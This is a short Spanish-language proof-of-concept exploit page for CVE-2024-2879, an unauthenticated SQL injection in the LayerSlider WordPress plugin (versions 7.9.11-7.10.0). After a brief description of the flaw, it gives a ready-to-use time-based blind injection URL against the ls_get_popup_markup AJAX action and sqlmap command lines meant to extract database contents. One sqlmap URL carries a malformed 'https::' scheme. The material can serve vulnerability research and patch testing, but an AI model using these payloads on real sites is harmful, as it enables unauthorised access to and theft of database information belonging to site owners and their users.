
Exploit de prueba de concepto para CVE-2024-2879: inyección SQL sin autenticación en el plugin LayerSlider de WordPress (7.9.11-7.10.0). Incluye script de escáner y guía de explotación con SQLMap para extraer información de la base de datos.
LayerSlider 7.9.11 - 7.10.0 - Inyección SQL no autenticada
El plugin LayerSlider para WordPress es vulnerable a la inyección SQL a través de la acción ls_get_popup_markup en las versiones 7.9.11 y 7.10.0 debido a un escape insuficiente del parámetro proporcionado por el usuario y a la falta de preparación suficiente en la consulta SQL existente. Esto permite que atacantes no autenticados añadan consultas SQL adicionales a las consultas ya existentes, que pueden utilizarse para extraer información sensible de la base de datos.

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq"
Tiempo de respuesta con retraso de 5 segundos

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
o
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T